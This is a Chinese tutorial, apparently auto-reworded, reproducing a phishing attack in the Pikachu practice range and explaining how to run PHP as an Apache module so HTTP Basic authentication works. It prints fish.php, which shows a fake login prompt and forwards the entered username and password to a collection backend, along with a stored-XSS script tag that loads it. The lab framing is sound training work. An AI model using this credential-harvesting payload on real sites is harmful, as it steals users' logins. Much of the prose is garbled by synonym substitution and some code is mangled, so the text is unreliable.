全国服务热线:4008-888-888

技术知识

Pikachu靶场复现垂钓进攻之Basic验证后数据信息没

web安全性团结一致互帮互助,要我们相互发展!

当今部位:首页 > 技术性新闻资讯 > 互联网安全性 > web安全性 >

大家的优点: 十年有关制造行业工作经验,技术专业设计方案师量身定做订制 设计方案师一对一服务方式,上千家顾客实例! 公司确保,靠谱步骤,靠谱协作 7*二十四小时线上服务,售后服务安心
Pikachu靶场复现垂钓进攻之Basic验证后数据信息没法推送到后台管理,PHP的HTTP真实身份认证体制仅在PHP做为Apache控制模块运作时合理

引言:Pikachu靶场复现垂钓进攻之Basic验证后数据信息没法推送到后台管理,反复弹出来验证提醒框缘故剖析及处理方式,PHP的HTTP真实身份认证体制仅在PHP做为Apache控制模块运作时合理。

  Pikachu靶场复现垂钓进攻之Basic验证后数据信息没法推送到后台管理,反复弹出来验证提醒框缘故剖析及处理方式。


 后台管理fish.php编码


?php error_reporting(0); // var_dump($_SERVER); if ((!isset($_SERVER[ PHP_AUTH_USER ])) || (!isset($_SERVER[ PHP_AUTH_PW ]))) { //     header( Content-type:text/html;charset=utf-8 );     header( WWW-Authenticate: Basic realm= 验证 );     header( HTTP/1.0 401 Unauthorized );     echo Authorization Required. ;     exit; } else if ((isset($_SERVER[ PHP_AUTH_USER ])) (isset($_SERVER[ PHP_AUTH_PW ]))){ //将結果推送给收集信息内容的后台管理,请将这儿的IP详细地址改动为管理方法后台管理的IP     header( Location: pikachu/pkxss/?username={$_SERVER[PHP_AUTH_USER]}     password={$_SERVER[PHP_AUTH_PW]} );     exit; }  ?


 在这里里能看出,基本逻辑性是明确$ _SERVER [ PHP_AUTH_USER ]或$ _SERVER [ PHP_AUTH_PW ]是不是为空。假如为空,则弹出来真实身份认证对话框。可是,在试验全过程中,发觉不管怎样键入,验证框全是持续循环系统的,猜想键入內容沒有传送给这2个自变量。因而,删掉了var_dump($ _ SERVER)的注解,以查询$ _SERVER自变量中包括什么数据信息。

array(44) {    [ PATH ]= string(726) G:\XShell6\;...E:\Git\bin;    [ SYSTEMROOT ]= string(10) C:\WINDOWS    [ COMSPEC ]= string(27) C:\WINDOWS\system32\cmd.exe    [ PATHEXT ]= string(53) .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC    [ WINDIR ]= string(10) C:\WINDOWS    [ PHP_FCGI_MAX_REQUESTS ]= string(4) 1000    [ PHPRC ]= string(31) G:/-7.0.12-nts/    [ _FCGI_SHUTDOWN_EVENT_ ]= string(4) 2312    [ SCRIPT_NAME ]= string(29) /pikachu/pkxss/    [ REQUEST_URI ]= string(29) /pikachu/pkxss/    [ QUERY_STRING ]= string(0)    [ REQUEST_METHOD ]= string(3) GET    [ SERVER_PROTOCOL ]= string(8) HTTP/1.1    [ GATEWAY_INTERFACE ]= string(7) CGI/1.1    [ REMOTE_PORT ]= string(4) 1278    [ SCRIPT_FILENAME ]= string(44) G:/phpStudy/WWW/pikachu/pkxss/    [ SERVER_ADMIN ]= string(18)    [ CONTEXT_DOCUMENT_ROOT ]= string(15) G:/phpStudy/WWW    [ CONTEXT_PREFIX ]= string(0)    [ REQUEST_SCHEME ]= string(4) http    [ DOCUMENT_ROOT ]= string(15) G:/phpStudy/WWW    [ REMOTE_ADDR ]= string(9) 127.0.0.1    [ SERVER_PORT ]= string(2) 80    [ SERVER_ADDR ]= string(9) 127.0.0.1    [ SERVER_NAME ]= string(9) 127.0.0.1    [ SERVER_SOFTWARE ]= string(52) Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9    [ SERVER_SIGNATURE ]= string(0)    [ SystemRoot ]= string(10) C:\WINDOWS    [ HTTP_COOKIE ]= string(36) PHPSESSID=i8puesvk7tu2s13kokh88qgtu1    [ HTTP_ACCEPT_LANGUAGE ]= string(14) zh-CN,zh;q=0.9    [ HTTP_ACCEPT_ENCODING ]= string(17) gzip, deflate, br    [ HTTP_SEC_FETCH_MODE ]= string(8) navigate    [ HTTP_SEC_FETCH_SITE ]= string(4) none    [ HTTP_ACCEPT ]= string(124) text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9    [ HTTP_SEC_FETCH_USER ]= string(2) ?1    [ HTTP_USER_AGENT ]= string(115) Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36    [ HTTP_UPGRADE_INSECURE_REQUESTS ]= string(1) 1    [ HTTP_CACHE_CONTROL ]= string(9) max-age=0    [ HTTP_CONNECTION ]= string(5) close    [ HTTP_HOST ]= string(9) 127.0.0.1    [ FCGI_ROLE ]= string(9) RESPONDER    [ PHP_SELF ]= string(29) /pikachu/pkxss/    [ REQUEST_TIME_FLOAT ]= float(.2173)    [ REQUEST_TIME ]= int()  }  Authorization Required.


 在这里里,您能看到沒有2个自变量$ _SERVER [ PHP_AUTH_USER ]和$ _SERVER [ PHP_AUTH_PW ]。检索以后发觉了缘故:PHP的HTTP真实身份认证体制仅在PHP做为Apache控制模块运作时才合理,()网页页面,您能看到Server API是CGI / FastCGI。

blob.png

 因而,如今您了解,只必须在控制模块方式下运作PHP就可以使HTTP真实身份认证体制起效。phpStudy默认设置以CGI / FastCGI方式运作。假如要做为控制模块运作,则必须安裝Apache和相对版本号的PHP。


  安裝Apache


  最先免费下载Apache。Apache在VC运作时库文件运作。假如沒有VC库,则还可以在此网页页面左右载相对的VC14或VC15。


  免费下载后,缓解压力缩到特定文件目录,开启Apache24 / conf / httpd.conf文档,寻找Define SRVROOT,随后将/ Apache24改动为缓解压力缩文件目录,以下所显示,在G:\ Apache24文件目录中缓解压力缩

Define SRVROOT G:\Apache24


 随后以管理方法员管理权限开启CMD并实行下列指令

G:\Apache24\bin\httpd.exe -k install -n apache


 转到bin文件目录并运作ApacheMonitor.exe。单击点击拖盘上的小Apache标志,挑选“刚开始”,随后浏览localhost开展检测


  配备PHP


  有关PHP版本号的挑选,必须留意下列几个方面


  VC版本号:在控制模块方式下运作,VC版本号库必须维持一致。Apache是VC15,因而PHP也务必挑选VC15。并且,假如测算机上沒有VC15运作时,则必须独立安裝。


  TS / NTS:TS就是指多段程搭建,NTS仅就是指单进程搭建。NTS一般可用于CGI / FastCGI,因而必须在这里挑选TS版本号


  x86 / x64:Apache以往是x86,请试着挑选同一版本号以免各种各样兼容问题。因此挑选x86


  假如您的Apache版本号与我的同样:httpd-2.4.41-o111c-x86-vc15-r2,则PHP挑选:php-7.x.x-Win32-vc15-x86.zip

  免费下载PHP并缓解压力缩


  开启Apache的httpd.conf文档并在最终加上配备

# 这里改动给你的PHP文件目录 LoadModule php7_module G:/php/php7apache2_4.dll PHPIniDir G:/php AddType application/x-httpd-php .php


再次起动Apache,在Apache安裝文件目录下的htdocs文件目录中建立一个新的test.php,并撰写下列內容:

?(); ?


最终,根据访问器浏览:[http://](http://),能看到网络服务器API是Apache 2.0 Handler。

blob.png

  垂钓进攻复现


  最先将PHP.ini-production文档拷贝到PHP安裝文件目录中,并将其重新命名为php.ini,随后开启


  寻找extension = mysqli,除掉前边; 


  寻找extension_dir =“ ext”,删掉前一个; 并将其改动为PHP相对路径下的ext

extension_dir = G:/php/ext


 将Pikachu靶场拷贝到htdocs文件目录并起动MySQL。这儿应用phpStudy自然环境。因为Apache已独立安裝和开启,因而您只必须在这里独立起动MySQL。

blob.png

 访问器浏览:pikachu/vul/,插进故意编码                             script src= pikachu/pkxss/ script


 开启另外一个访问器,仿真模拟一般客户浏览pikachu/vul/,在弹出来的会话框中键入账号登陆密码,键入后点击“明确”。

blob.png

这时,网络黑客能够从后台管理见到账号登陆密码。 到此,全部试验总算完毕了。

blob.png

PHP运作方式


  它是PHP的四种实际操作方式:


  CGI协议书方式:此方式容许Web网络服务器根据特殊协议书与运用程序开展通讯。由于每一个客户恳求都务必fork建立全过程来启用程序,随后消毁该全过程,因此特性很低。 启用基本原理大概为:


  客户规定


  Web网络服务器接到恳求


  fork子过程启用者/实行者


  程序回到內容/程序启用完毕


  Web网络服务器接受內容


  回到客户

  迅速CGI协议书方式:CGI协议书方式升級。它如同一个长驻型CGI。 要是开启恳求,它就自始至终能够解决恳求,而且不用完毕该全过程。 启用基本原理大概为:


  Web网络服务器迅速CGI步骤管理方法器原始化


  事先fork n客户的恳求


  Web网络服务器接到恳求


  转交给Fast-CGI步骤管理方法器


  由Fast-CGI过程管理方法地区接受并由空余的Fast-CGI过程之一解决


  解决进行,Fast-CGI过程变成空余,等候下一个恳求


  Web网络服务器接受內容


  回到客户

  Apache 2.0 Handler控制模块方式:默认设置状况下,Apache PHP运作时应用控制模块方式。它应用PHP做为Apache控制模块来起动Apache起动。PHP过程和Apache过程融合在一起。接到客户恳求后,可根据启用mod_php控制模块立即对其开展解决。 控制模块方式以mod_php5控制模块的方式集成化。这时候,mod_php5控制模块的功效是接受Apache传送的PHP文档恳求,解决这种恳求,随后将解决后的結果回到给Apache。 假如大家在Apache起动以前在其配备文档中配备了PHP控制模块(mod_php5),则PHP控制模块将申请注册Apache2的ap_hook_post_config挂勾,并在Apache起动时起动此控制模块以接纳对PHP文档的恳求。


  PHP-Cli方式:指令行方式。此方式不用一切别的程序,您能够根据立即输入php xx.php立即实行PHP编码。 指令行方式与基本Web方式不一样。


  沒有请求超时


  Buffer缓存默认设置关掉


  STDIN和STDOUT规范键入/輸出/不正确应用


  echo,等立即輸出到操纵台


  能用的类/涵数不一样


  php.ini配备的差别




在线客服

关闭

客户服务热线
4008-888-888


点击这里给我发消息 在线客服

点击这里给我发消息 在线客服